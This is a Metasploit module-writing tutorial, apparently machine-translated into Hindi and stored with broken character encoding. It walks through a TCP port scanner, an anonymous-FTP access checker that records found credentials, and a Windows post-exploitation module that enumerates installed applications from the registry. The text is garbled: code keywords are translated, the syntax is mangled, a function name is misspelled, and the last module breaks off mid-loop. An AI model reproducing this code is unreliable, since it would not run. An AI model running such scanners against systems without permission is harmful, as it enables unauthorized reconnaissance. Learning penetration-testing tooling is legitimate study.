рдпрд╣ рдкрдВрдХреНрддрд┐ рдЙрд╕ рд╡рд░реНрдЧ рдХреЛ рдкрд░рд┐рднрд╛рд╖рд┐рдд рдХрд░рддреА рд╣реИ рдЬреЛ рд╕рд╣рд╛рдпрдХ рдкрд░рд┐рд╡рд╛рд░ рдХреЗ рдЧреБрдгреЛрдВ рдХреЛ рд╡рд┐рд░рд╛рд╕рдд рдореЗрдВ рджреЗрддрд╛ рд╣реИред рд╕рд╣рд╛рдпрдХ рдореЙрдбреНрдпреВрд▓ рдХрдИ рдХрд╛рд░реНрдпреЛрдВ рдХреЛ рдЖрдпрд╛рдд рдХрд░ рд╕рдХрддрд╛ рд╣реИ, рдЬреИрд╕реЗ рд╕реНрдХреИрдирд┐рдВрдЧ, рдХрдиреЗрдХреНрд╢рди рдЦреЛрд▓рдирд╛, рдбреЗрдЯрд╛рдмреЗрд╕ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдирд╛, рдФрд░ рдЗрд╕реА рддрд░рд╣:
Msf :: рд╢рд╛рдорд┐рд▓ рдХрд░реЗрдВ
рд╢рд╛рдорд┐рд▓ рд╡рд┐рд╡рд░рдг рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд┐рд╕реА рдореЙрдбреНрдпреВрд▓ рдореЗрдВ рд╡рд┐рд╢рд┐рд╖реНрдЯ рд░реВрдкрд░реЗрдЦрд╛ рдХрд╛рд░реНрдпрдХреНрд╖рдорддрд╛ рдХреЛ рд╢рд╛рдорд┐рд▓ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИред рдЙрджрд╛рд╣рд░рдг рдХреЗ рд▓рд┐рдП, рдпрджрд┐ рд╣рдо рдПрдХ рд╕реНрдХреИрдирд░ рдореЙрдбреНрдпреВрд▓ рдХрд╛ рдирд┐рд░реНрдорд╛рдг рдХрд░ рд░рд╣реЗ рд╣реИрдВ, рддреЛ рдЖрдк рдЗрд╕реЗ рдЗрд╕ рдкреНрд░рдХрд╛рд░ рд╕рдХреНрд╖рдо рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ:
Msf :: рдПрдХреНрд╕рдкреНрд▓реЙрдЗрдЯ :: рд░рд┐рдореЛрдЯ :: рдЯреАрд╕реАрдкреА рд╢рд╛рдорд┐рд▓ рдХрд░реЗрдВ
рдЗрд╕ рд▓рд╛рдЗрди рдореЗрдВ рд░рд┐рдореЛрдЯ рдЯреАрд╕реАрдкреА рд╕реНрдХреИрди рдХрд╛рд░реНрдпрдХреНрд╖рдорддрд╛ рд╢рд╛рдорд┐рд▓ рд╣реЛрдЧреАред
рдЖрд░рдВрднреАрдХреГрдд рдХрд░рдирд╛
рд╕реБрдкрд░ (
'рдирд╛рдо' => 'рдЯреАрд╕реАрдкреА рдкреЛрд░реНрдЯ рд╕реНрдХреИрдирд░',
'рд╕рдВрд╕реНрдХрд░рдг' => '$ рд╕рдВрд╢реЛрдзрди $',
'рд╡рд┐рд╡рд░рдг' => 'рдЦреБрд▓реА рдЯреАрд╕реАрдкреА рд╕реЗрд╡рд╛рдУрдВ рдХреА рдЧрдгрдирд╛ рдХрд░реЗрдВ',
'рд▓реЗрдЦрдХ' => [рдбрд╛рд░реНрдХрд▓реЙрд░реНрдб],
'рд▓рд╛рдЗрд╕реЗрдВрд╕' => MSF_LICENSE
) рд╕реНрдХреНрд░рд┐рдкреНрдЯ рд▓рд╛рдЗрдиреЗрдВ рд╣рдореЗрдВ рдореЙрдбреНрдпреВрд▓, рдЙрд╕рдХреЗ рдирд╛рдо, рд╕рдВрд╕реНрдХрд░рдг, рд▓реЗрдЦрдХ, рд╡рд┐рд╡рд░рдг, рдЖрджрд┐ рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рдЬрд╛рдирдХрд╛рд░реА рджреЗрддреА рд╣реИрдВред
register_options (
[
OptString.new ('PORTS', [рд╕рдЪ, "рд╕реНрдХреИрди рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдкреЛрд░реНрдЯ (рдЬреИрд╕реЗ 25,80,110-900)", "1-10000"]]
OptInt.new ('рдЯрд╛рдЗрдордЯрд╛рдЗрдо', [рд╕рдЪ, "рд╕реЙрдХреЗрдЯ рдХрдиреЗрдХреНрдЯ рдЯрд╛рдЗрдордЖрдЙрдЯ рдЗрди рдорд┐рд▓реАрд╕реЗрдХрдВрдб", 1000,),
OptInt.new ('CONCURRENCY', [рд╕рдЪ рд╣реИ, "рдкреНрд░рддрд┐ рд╣реЛрд╕реНрдЯ рдХреА рдЬрд╛рдБрдЪ рдХреЗ рд▓рд┐рдП рд╕рдорд╡рд░реНрддреА рдмрдВрджрд░рдЧрд╛рд╣реЛрдВ рдХреА рд╕рдВрдЦреНрдпрд╛", 10]), self.class)
deregister_options ('рдкрд░рд┐рдгрд╛рдо') рдореЙрдбреНрдпреВрд▓ рд╡рд┐рд╢реНрд▓реЗрд╖рдг
рдЕрдм рд╣рдо ftp рдореЙрдбреНрдпреВрд▓ рдХрд╛ рд╡рд┐рд╢реНрд▓реЗрд╖рдг рдХрд░реЗрдВрдЧреЗред рд╣рдордиреЗ рдкрд┐рдЫрд▓реЗ рдиреБрд╕реНрдЦрд╛ рдореЗрдВ рдкрд╣рд▓реЗ рд╕реЗ рд╣реА рдмреБрдирд┐рдпрд╛рджреА рдореЙрдбреНрдпреВрд▓ рдЯреЗрдореНрдкрд▓реЗрдЯ рдкрд░ рдЪрд░реНрдЪрд╛ рдХреА, рдЗрд╕рд▓рд┐рдП рдпрд╣рд╛рдВ рд╣рдо рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдХреЗ рдореБрдЦреНрдп рднрд╛рдЧ рд╕реЗ рдЖрдЧреЗ рдмрдврд╝реЗрдВрдЧреЗред
рд╡рд┐рд╢реНрд▓реЗрд╖рдг рдХреЗ рд▓рд┐рдП, рд╣рдо рдЕрдирд╛рдо рдПрдлрд╝рдЯреАрдкреА рдПрдХреНрд╕реЗрд╕ рдореЙрдбреНрдпреВрд▓ рд▓реЗрддреЗ рд╣реИрдВред рдореБрдЦреНрдп рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдирд┐рдореНрдирд▓рд┐рдЦрд┐рдд рдкрддреЗ рдкрд░ рд╕реНрдерд┐рдд рд╣реИ:
рдкреЗрдВрдЯреЗрд╕реНрдЯ / рдХрд╛рд░рдирд╛рдореЗ / рдврд╛рдВрдЪрд╛ 3 / рдореЙрдбреНрдпреВрд▓ / рд╕рд╣рд╛рдпрдХ / рд╕реНрдХреИрдирд░ / рдПрдлрд╝рдЯреАрдкреА / рдПрд╕рдЯреАрдмреАредрд╕рдВрджрд░реНрдн рдХреЗ рд▓рд┐рдП рдкреВрд░реА рд╕реНрдХреНрд░рд┐рдкреНрдЯ:
рд╡рд░реНрдЧ Metasploit3 <Msf :: рд╕рд╣рд╛рдпрдХ
Msf :: рдПрдХреНрд╕рдкреНрд▓реЙрдЗрдЯ :: рд░рд┐рдореЛрдЯ :: Ftp рд╢рд╛рдорд┐рд▓ рдХрд░реЗрдВ
Msf :: рд╕рд╣рд╛рдпрдХ :: рд╕реНрдХреИрдирд░ рд╢рд╛рдорд┐рд▓ рдХрд░реЗрдВ
Msf :: рд╕рд╣рд╛рдпрдХ :: рд░рд┐рдкреЛрд░реНрдЯ рд╢рд╛рдорд┐рд▓ рдХрд░реЗрдВ
рдЖрд░рдВрднреАрдХреГрдд рдХрд░рдирд╛
рд╕реБрдкрд░ (
'рдирд╛рдо' => 'рдЕрдирд╛рдо рдПрдлрд╝рдЯреАрдкреА рдЕрднрд┐рдЧрдо рдЬрд╛рдВрдЪ',
'рд╕рдВрд╕реНрдХрд░рдг' => '$ рд╕рдВрд╢реЛрдзрди: 14774 $',
'рд╡рд┐рд╡рд░рдг' => 'рдЧреБрдордирд╛рдо (рдкрдврд╝рдиреЗ / рд▓рд┐рдЦрдиреЗ) рдПрдлрд╝рдЯреАрдкреА рд╕рд░реНрд╡рд░ рдХрд╛ рдЙрдкрдпреЛрдЧред'
'рд╕рдВрджрд░реНрдн' => [['URL', 'http://en.wikipedia.org/wiki/File_Transfer_Protocol#Anonymous_FTP'],],
'рд▓реЗрдЦрдХ' => 'рдорд╛рдЯреЗрдУ рдХреИрдВрдЯреЛрдиреА <goony [at] nothink.org>'
'рд▓рд╛рдЗрд╕реЗрдВрд╕' => MSF_LICENSE
)
register_options ([рдСрдкреНрдЯ :: RPORT (21),], self.class)
рдЕрдВрдд
def run_host (target_host)
рд╢реБрд░реВ рдХрд░рдирд╛
res = connect_login (рд╕рд╣реА, рдЧрд▓рдд)
banner.strip! рдЕрдЧрд░ рдмреИрдирд░
dir = Rex :: Text.rand_text_alpha (8)
рдЕрдЧрд░ рд░рд┐рдЬ
write_check = send_cmd (['MKD', dir], рд╕рдЪ)
рдЕрдЧрд░ (рд░рд╛рдЗрдЯ_рдЪреЗрдХ рдФрд░ рд░рд╛рдЗрдЯ_рдЪреЗрдЪ = ~ / ^ 2 /)
send_cmd (['RMD', dir], рд╕рдЪ)
Print_status ("# {target_host}: # {rport} рдмреЗрдирд╛рдореА READ / WRITE (# {рдмреИрдирд░}"))
access_type = "rw"
рдЕрдиреНрдпрдерд╛
Print_status ("# {target_host}: # {rport} рдмреЗрдирд╛рдореА READ (# {рдмреИрдирд░})")
access_type = "ro"
рдЕрдВрдд
report_auth_info (
: рд╣реЛрд╕реНрдЯ => target_host,
: рдкреЛрд░реНрдЯ => рдЖрд░рдкреЛрд░реНрдЯ,
: sname => 'ftp',
: рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ => рдбреЗрдЯрд╛рд╕реНрдЯреЛрд░ ['FTPUSER'],
: рдкрд╛рд╕ => рдбреЗрдЯрд╛рд╕реНрдЯреЛрд░ ['FTPPASS'],
: рдЯрд╛рдЗрдк => "рдкрд╛рд╕рд╡рд░реНрдб _ # {access_type}",
: рд╕рдХреНрд░рд┐рдп => рд╕рддреНрдп
)
рдЕрдВрдд
рдбрд┐рд╕реНрдХрдиреЗрдХреНрдЯ
рдмрдЪрд╛рд╡ :: рдмрд╛рдзрд╛
$ рдмрдврд╝рд╛рдУ!
рдмрдЪрд╛рд╡ :: Rex :: ConnectionError, :: IOError
рдЕрдВрдд
рдЕрдВрдд
рдЕрдВрдд рдЖрдЗрдП рд╡рд┐рд╢реНрд▓реЗрд╖рдг рдХрд░реЗрдВ рдХрд┐ рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдХреИрд╕реЗ рдХрд╛рдо рдХрд░рддреА рд╣реИ:
def run_host (target_host)
рд╢реБрд░реВ рдХрд░рдирд╛
res = connect_login (рд╕рд╣реА, рдЧрд▓рдд)
banner.strip! рдЕрдЧрд░ рдмреИрдирд░
dir = Rex :: Text.rand_text_alpha (8) рдЗрд╕ рдлрд╝рдВрдХреНрд╢рди рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрдиреЗрдХреНрд╢рди рд╢реБрд░реВ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИред
Res рд╡реИрд░рд┐рдПрдмрд▓ рдореЗрдВ рдмреВрд▓рд┐рдпрди рдорд╛рди
рд╕рд╣реА рдпрд╛
рдЧрд▓рдд рд╣реИ ред
Connect_login рдлрд╝рдВрдХреНрд╢рди рджреВрд░рд╕реНрде рд╣реЛрд╕реНрдЯ рд╕реЗ рдХрдиреЗрдХреНрд╢рди рд╕реНрдерд╛рдкрд┐рдд рдХрд░рддрд╛ рд╣реИред
рдЕрдЧрд░ рд░рд┐рдЬ
write_check = send_cmd (['MKD', dir], рд╕рдЪ)
рдЕрдЧрд░ (рд░рд╛рдЗрдЯ_рдЪреЗрдХ рдФрд░ рд░рд╛рдЗрдЯ_рдЪреЗрдЪ = ~ / ^ 2 /)
send_cmd (['RMD', dir], рд╕рдЪ)
Print_status ("# {target_host}: # {rport} рдмреЗрдирд╛рдореА READ / WRITE (# {рдмреИрдирд░}"))
access_type = "rw"
рдЕрдиреНрдпрдерд╛
Print_status ("# {target_host}: # {rport} рдЕрдирд╛рдо рдкрд╣реБрдБрдЪ_рдЯрд╛рдЗрдк =" ro " рдПрдХ рдмрд╛рд░ рдХрдиреЗрдХреНрд╢рди рд╕реНрдерд╛рдкрд┐рдд рд╣реЛ рдЬрд╛рдиреЗ рдХреЗ рдмрд╛рдж, рдореЙрдбреНрдпреВрд▓ рдпрд╣ рдЬрд╛рдВрдЪрдиреЗ рдХреА рдХреЛрд╢рд┐рд╢ рдХрд░рддрд╛ рд╣реИ рдХрд┐ рдЕрдирд╛рдо рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдиреЗ рдЕрдиреБрдорддрд┐рдпреЛрдВ рдХреЛ рдкрдврд╝рд╛ / рд▓рд┐рдЦрд╛ рд╣реИ рдпрд╛ рдирд╣реАрдВред
рд░рд╛рдЗрдЯ- рдЪреЗрдХ рдЬрд╛рдБрдЪрддрд╛ рд╣реИ рдХрд┐ рдХреНрдпрд╛ рд░рд╛рдЗрдЯ рдСрдкрд░реЗрд╢рди рд╕рдВрднрд╡ рд╣реИ рдпрд╛ рдирд╣реАрдВред рдпрд╣ рддрдм рдЬрд╛рдВрдЪрддрд╛ рд╣реИ рдХрд┐ рдСрдкрд░реЗрд╢рди рд╕рдлрд▓ рд╣реИ рдпрд╛ рдирд╣реАрдВред рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░реЛрдВ рдХреА рд╕реНрдерд┐рддрд┐ рдХреЗ рдЖрдзрд╛рд░ рдкрд░, рд╕реНрдХреНрд░реАрди рдкрд░ рдПрдХ рд╕рдВрджреЗрд╢ рдореБрджреНрд░рд┐рдд рд╣реЛрддрд╛ рд╣реИред рдпрджрд┐ рд▓реЗрдЦрди рдСрдкрд░реЗрд╢рди "рд╡рд┐рдлрд▓" рд╣реИ, рддреЛ рд╕реНрдерд┐рддрд┐ рдХреЛ
рдЖрд░рдУ рдпрд╛ рдХреЗрд╡рд▓ рдкрдврд╝рдиреЗ рдХреЗ рд▓рд┐рдП рдореБрджреНрд░рд┐рдд рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИ:
report_auth_info (
: рд╣реЛрд╕реНрдЯ => target_host,
: рдкреЛрд░реНрдЯ => рдЖрд░рдкреЛрд░реНрдЯ,
: sname => 'ftp',
: рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ => рдбреЗрдЯрд╛рд╕реНрдЯреЛрд░ ['FTPUSER'],
: рдкрд╛рд╕ => рдбреЗрдЯрд╛рд╕реНрдЯреЛрд░ ['FTPPASS'],
: рдЯрд╛рдЗрдк => "рдкрд╛рд╕рд╡рд░реНрдб _ # {access_type}",
: рд╕рдХреНрд░рд┐рдп => рд╕рддреНрдп
)
рдЕрдВрдд рдпрд╣ рдПрдХ рдЫреЛрдЯрд╛ рдкреНрд░рджрд░реНрд╢рди рдерд╛ рдХрд┐ рдПрдХ рдлреНрд░реЗрдорд╡рд░реНрдХ рдореЗрдВ рдореЙрдбреНрдпреВрд▓ рдХреИрд╕реЗ рдХрд╛рдо рдХрд░рддрд╛ рд╣реИред рдЖрдк рдЕрдкрдиреА рдЖрд╡рд╢реНрдпрдХрддрд╛рдУрдВ рдХреЗ рдЕрдиреБрд░реВрдк рдореМрдЬреВрджрд╛ рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдХреЛ рд╕рдВрд╢реЛрдзрд┐рдд рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред
рдирд┐рдореНрдирд▓рд┐рдЦрд┐рдд рдЙрджрд╛рд╣рд░рдг рдореЗрдВ, рд╣рдо рджреЗрдЦреЗрдВрдЧреЗ рдХрд┐ рдХреИрд╕реЗ рдЕрдкрдирд╛ рдЦреБрдж рдХрд╛ рдореЙрдбреНрдпреВрд▓ рдмрдирд╛рдПрдВ рдФрд░ рдЗрд╕реЗ рдлреНрд░реЗрдорд╡рд░реНрдХ рдореЗрдВ рд▓реЛрдб рдХрд░реЗрдВред
рдкреЛрд╕реНрдЯ-рдкреНрд░реЛрдбрдХреНрд╢рди рдореЙрдбреНрдпреВрд▓ рдмрдирд╛рдирд╛
рдЪрд▓реЛ рдПрдХ рдЫреЛрдЯрд╛ рдкреЛрд╕реНрдЯ-рдкреНрд░реЛрдбрдХреНрд╢рди рдореЙрдбреНрдпреВрд▓ рдмрдирд╛рддреЗ рд╣реИрдВ рдЬреЛ рд▓рдХреНрд╖реНрдп рдорд╢реАрди рдкрд░ рд╕рднреА рд╕реНрдерд╛рдкрд┐рдд рдЕрдиреБрдкреНрд░рдпреЛрдЧреЛрдВ рдХреЛ рд╕реВрдЪреАрдмрджреНрдз рдХрд░реЗрдЧрд╛ред
рдПрдХ рдореЙрдбреНрдпреВрд▓ рдмрдирд╛рдХрд░ рд╢реБрд░реВ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП, рд╣рдо рдкрд╣рд▓реЗ рдкреБрд╕реНрддрдХрд╛рд▓рдп рдХреЗ рдврд╛рдВрдЪреЗ рдХреЛ рдЖрдпрд╛рдд рдХрд░рддреЗ рд╣реИрдВ рдФрд░ рдЖрд╡рд╢реНрдпрдХ рдирд┐рд░реНрднрд░рддрд╛рдПрдВ рд╢рд╛рдорд┐рд▓ рдХрд░рддреЗ рд╣реИрдВ:
рд╕рдмрд╕реЗ рдкрд╣рд▓реЗ, рдкреБрд╕реНрддрдХрд╛рд▓рдп рдврд╛рдВрдЪреЗ рдХреЛ рдЖрдпрд╛рдд рдХрд░реЗрдВ рдФрд░ рдЖрд╡рд╢реНрдпрдХ рдирд┐рд░реНрднрд░рддрд╛рдПрдВ рд╕рдХреНрд╖рдо рдХрд░реЗрдВ:
рдЖрд╡рд╢реНрдпрдХрддрд╛ 'msf / рдХреЛрд░'
'рд░реЗрдХреНрд╕' рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛
'рдПрдордПрд╕рдПрдл / рдХреЛрд░ / рдкреЛрд╕реНрдЯ / рд╡рд┐рдВрдбреЛ / рд░рдЬрд┐рд╕реНрдЯреНрд░реА' рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реИ
рд╡рд░реНрдЧ Metasploit3 <Msf :: рдкреЛрд╕реНрдЯ
Msf :: рдкреЛрд╕реНрдЯ :: рд╡рд┐рдВрдбреЛрдЬ :: рд░рдЬрд┐рд╕реНрдЯреНрд░реА рд╢рд╛рдорд┐рд▓ рдХрд░реЗрдВ
рдЖрд░рдВрднреАрдХреГрдд рдХрд░рдирд╛ (рдЬрд╛рдирдХрд╛рд░реА = {})
рд╕реБрдкрд░ (update_info (рдЬрд╛рдирдХрд╛рд░реА,
'рдирд╛рдо' => 'рд╡рд┐рдВрдбреЛрдЬ рдЗрдХрдЯреНрдард╛ рд╕реНрдерд╛рдкрд┐рдд рдЕрдиреБрдкреНрд░рдпреЛрдЧ рдЧрдгрди')
'рд╡рд┐рд╡рд░рдг' =>% q {рдпрд╣ рдореЙрдбреНрдпреВрд▓ рд╕рднреА рдЗрдВрд╕реНрдЯреЙрд▓ рдХрд┐рдП рдЧрдП рдЕрдиреБрдкреНрд░рдпреЛрдЧреЛрдВ рдХреА рдЧрдгрдирд╛ рдХрд░реЗрдЧрд╛},
'рд▓рд╛рдЗрд╕реЗрдВрд╕' => MSF_LICENSE,
'рдкреНрд▓реЗрдЯрдлрд╝реЙрд░реНрдо' => ['рд╡рд┐рдВрдбреЛрдЬрд╝'],
'рд╕реЗрд╢рдирдЯрд╛рдЗрдкреНрд╕' => ['рдореАрдЯрд░рдкрд░реЗрдЯрд░']
))
рдЕрдВрдд рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдХреА рд╢реБрд░реБрдЖрдд рдореЗрдЯрд╛рд╕реИрдкреНрд▓реЛрдЗрдЯ рдХреЛрд░ рд▓рд╛рдЗрдмреНрд░реЗрд░реАрдЬрд╝ рд╕реЗ рд╣реЛрддреА рд╣реИред рдлрд┐рд░ рд╣рдо рдПрдХ рд╡рд░реНрдЧ рдмрдирд╛рддреЗ рд╣реИрдВ рдЬреЛ Msf :: рдкреЛрд╕реНрдЯ рдореЙрдбреНрдпреВрд▓ рдХреЗ рдЧреБрдгреЛрдВ рдХрд╛ рд╡рд┐рд╕реНрддрд╛рд░ рдХрд░рддрд╛ рд╣реИред
рдЕрдЧрд▓рд╛, рд╣рдо рдПрдХ рдЗрдирд┐рд╢рд┐рдпрд▓рд╛рдЗрдЬрд╝реЗрд╢рди рдлрдВрдХреНрд╢рди рдмрдирд╛рддреЗ рд╣реИрдВ рдЬрд┐рд╕рдХрд╛ рдЙрдкрдпреЛрдЧ рдореЙрдбреНрдпреВрд▓ рдкреНрд░реЙрдкрд░реНрдЯреАрдЬрд╝ рдФрд░ рд╡рд┐рд╡рд░рдг рдХреЛ рдЗрдирд┐рд╢рд┐рдпрд▓рд╛рдЗрдЬрд╝ рдХрд░рдиреЗ рдФрд░ рдкрд░рд┐рднрд╛рд╖рд┐рдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИред рдпрд╣ рдореВрд▓ рд╕рдВрд░рдЪрдирд╛ рд▓рдЧрднрдЧ рд╕рднреА рдореЙрдбреНрдпреВрд▓ рдореЗрдВ рд╕рдорд╛рди рд╣реИред
рдЕрдЧрд▓рд╛, рд╣рдо рдЗрдирд┐рд╢рд┐рдпрд▓рд╛рдЗрдЬрд╝реЗрд╢рди рдлрдВрдХреНрд╢рди рдмрдирд╛рддреЗ рд╣реИрдВ, рдЬрд┐рд╕рдХрд╛ рдЙрдкрдпреЛрдЧ рдореЙрдбреНрдпреВрд▓ рдХреЗ рдЧреБрдгреЛрдВ рдХреЛ рдЗрдирд┐рд╢рд┐рдпрд▓рд╛рдЗрдЬрд╝ рдХрд░рдиреЗ рдФрд░ рдирд┐рд░реНрдзрд╛рд░рд┐рдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИред рдпрд╣ рдореВрд▓ рд╕рдВрд░рдЪрдирд╛ рд▓рдЧрднрдЧ рд╕рднреА рдореЙрдбреНрдпреВрд▓ рдореЗрдВ рд╕рдорд╛рди рд╣реИред
рдпрд╣рд╛рдВ рдпрд╣ рдзреНрдпрд╛рди рджрд┐рдпрд╛ рдЬрд╛рдирд╛ рдЪрд╛рд╣рд┐рдП рдХрд┐ рд╣рдордиреЗ "
рд░реЗрдХреНрд╕ " рдХреЗ рд╕рд╛рде-рд╕рд╛рде "рд░рдЬрд┐рд╕реНрдЯреНрд░реА" рдкреБрд╕реНрддрдХрд╛рд▓рдпреЛрдВ рдХреЛ рднреА рд╢рд╛рдорд┐рд▓ рдХрд┐рдпрд╛ред
рдЕрдм рд╣рдорд╛рд░рд╛ рдЕрдЧрд▓рд╛ рдХрджрдо рдПрдХ рддрд╛рд▓рд┐рдХрд╛ рдмрдирд╛рдирд╛ рд╣реИ рдЬреЛ рд╣рдорд╛рд░реЗ рдирд┐рдХрд╛рд▓реЗ рдЧрдП рдкрд░рд┐рдгрд╛рдо рдХреЛ рдкреНрд░рджрд░реНрд╢рд┐рдд рдХрд░ рд╕рдХрддрд╛ рд╣реИред рд╣рдорд╛рд░реЗ рдкрд╛рд╕ рдПрдХ рд╡рд┐рд╢реЗрд╖ рдкреБрд╕реНрддрдХрд╛рд▓рдп рд╣реИ
Rex :: Ui :: рдкрд╛рда рдЬрд┐рд╕рдХрд╛ рдЙрдкрдпреЛрдЧ рдЗрд╕ рдХрд╛рд░реНрдп рдХреЛ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдХрд┐рдпрд╛ рдЬрд╛ рд╕рдХрддрд╛ рд╣реИред
app_list рдХреЛ рд╣рд░рд╛рдпрд╛
tbl = Rex :: Ui :: рдкрд╛рда :: Table.new (
'рд╣реИрдбрд░' => "рд╕реНрдерд╛рдкрд┐рдд рдЕрдиреБрдкреНрд░рдпреЛрдЧ",
'рдЗрдВрдбреЗрдВрдЯ' => 1,
'рдХреЙрд▓рдо' => ["рдирд╛рдо", "рд╕рдВрд╕реНрдХрд░рдг"])
рдРрдкреНрдкрд┐ = [
'HKLM \\ рд╕реЙрдлрд╝реНрдЯрд╡реЗрдпрд░ \\ Microsoft \\ Windows \\ CurrentVersion \\ рд╕реНрдерд╛рдкрдирд╛ рд░рджреНрдж рдХрд░реЗрдВ',
'HKCU \\ рд╕реЙрдлрд╝реНрдЯрд╡реЗрдпрд░ \\ Microsoft \\ Windows \\ CurrentVersion \\ рд╕реНрдерд╛рдкрдирд╛ рд░рджреНрдж рдХрд░реЗрдВ',
'HKLM \\ рд╕реЙрдлрд╝реНрдЯрд╡реЗрдпрд░ \\ WOW6432NODE \\ Microsoft \\ Windows \\ CurrentVersion \\ рд╕реНрдерд╛рдкрдирд╛ рд░рджреНрдж рдХрд░реЗрдВ',
'HKCU \\ рд╕реЙрдлрд╝реНрдЯрд╡реЗрдпрд░ \\ WOW6432NODE \\ Microsoft \\ Windows \\ CurrentVersion \\ рд╕реНрдерд╛рдкрдирд╛ рд░рджреНрдж рдХрд░реЗрдВ',
]
рдРрдкреНрд╕ = []
appkeys.each рдХрд░рддреЗ рд╣реИрдВ | keyx86 |
found_keys = рд░рдЬрд┐рд╕реНрдЯреНрд░реА_enumkeys (keyx86)
рдЕрдЧрд░ рдорд┐рд▓ рдЬрд╛рдП рддреЛ
found_keys.each рдХрд░рддреЗ рд╣реИрдВ | ak |
apps << keyx86 + "\\" + ak
рдЕрдВрдд
рдЕрдВрдд
рдЕрдВрдд рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдХрд╛ рдореБрдЦреНрдп рднрд╛рдЧ рдПрдХ рддрд╛рд▓рд┐рдХрд╛ рдФрд░ рд╡рд┐рднрд┐рдиреНрди рд╕реНрддрдВрдн рдирд╛рдореЛрдВ рдХреЗ рдирд┐рд░реНрдорд╛рдг рд╕реЗ рд╢реБрд░реВ рд╣реЛрддрд╛ рд╣реИред рдлрд┐рд░ рд░рдЬрд┐рд╕реНрдЯреНрд░реА рдореЗрдВ рдПрдХ рдЕрд▓рдЧ рд╕рд░рдгреА рдмрдирд╛рдИ рдЬрд╛рддреА рд╣реИ, рдЬрд┐рд╕рдХрд╛ рдЙрдкрдпреЛрдЧ рдЕрдиреБрдкреНрд░рдпреЛрдЧреЛрдВ рдХреА рд╕реВрдЪреА рдХреЛ рдПрдиреНрдпреВрдорд░реЗрдЯ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдХрд┐рдпрд╛ рдЬрд╛рдПрдЧрд╛ред рд╕рд░рдгреА рдореЗрдВ рд╡рд┐рднрд┐рдиреНрди рд░рдЬрд┐рд╕реНрдЯреНрд░реА рд▓рд╛рдЗрдиреЗрдВ рд╢рд╛рдорд┐рд▓ рд╣реЛрдВрдЧреА рдЬрд┐рдирдореЗрдВ рд▓рдХреНрд╖реНрдп рдХрдВрдкреНрдпреВрдЯрд░ рдкрд░ рд╕реНрдерд╛рдкрд┐рдд рдЕрдиреБрдкреНрд░рдпреЛрдЧреЛрдВ рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рдЬрд╛рдирдХрд╛рд░реА рд╣реЛрдЧреАред рдПрдкреНрд▓рд┐рдХреЗрд╢рди рдбреЗрдЯрд╛ рдХреЛ рдПрдХ рдЕрд▓рдЧ рд╕рд░рдгреА рдореЗрдВ рд╕рдВрдЧреНрд░рд╣реАрдд рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИ рдЬрд┐рд╕реЗ
рдПрдкреНрд▓рд┐рдХреЗрд╢рди рдХрд╣рд╛ рдЬрд╛рддрд╛
рд╣реИ ред
рддреЛ, рд╣рдо рдПрдХ рд▓реВрдк рдЪрд▓рд╛рдХрд░ рдПрдиреНрдпреВрдорд░реЗрд╢рди рдХреЛ рдкреНрд░реЛрд╕реЗрд╕ рдХрд░рдирд╛ рд╢реБрд░реВ рдХрд░рддреЗ рд╣реИрдВ, рдЬреЛ рдПрдкреНрд╕реНрдХреА рдПрд░реЗ рдореЗрдВ рд╕реНрдЯреЛрд░ рдХреА рдЧрдИ рд░рдЬрд┐рд╕реНрдЯреНрд░реА рдореЗрдВ рдЕрд▓рдЧ-рдЕрд▓рдЧ рдЬрдЧрд╣реЛрдВ рдкрд░ рджрд┐рдЦрддрд╛ рд╣реИред рдлрд┐рд░ рдЧрдгрдирд╛ рдкреНрд░рдХреНрд░рд┐рдпрд╛ рд╢реБрд░реВ рд╣реЛрддреА рд╣реИ, рдПрдХ рдЪрдХреНрд░ рд╢реБрд░реВ рд╣реЛрддрд╛ рд╣реИ рдЬреЛ рд░рдЬрд┐рд╕реНрдЯреНрд░реА рдореЗрдВ рд╡рд┐рднрд┐рдиреНрди рд╕реНрдерд╛рдиреЛрдВ рдкрд░ рджрд┐рдЦрддрд╛ рд╣реИ рдФрд░
рдПрдкреНрд╕реНрдХреА рд╕рд░рдгреА рдореЗрдВ рд╕рдВрдЧреНрд░рд╣реАрдд рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИ:
t = []
рдЬрдмрдХрд┐ (рдирд╣реАрдВ apps.empty?)
1.рдЕрдк (16) do t << Framework.threads.spawn ("рдореЙрдбреНрдпреВрд▓ (# {self.refname})", рдЧрд▓рдд, apps.shift) рдХрд░рдирд╛ | k |
рд╢реБрд░реВ рдХрд░рдирд╛
dispnm = que_getvaldata ("# {k}", "DisplayName")
рдлреИрд▓рд╛рд╡ = nur_getvaldata ("# {k}", "DisplayVersion")
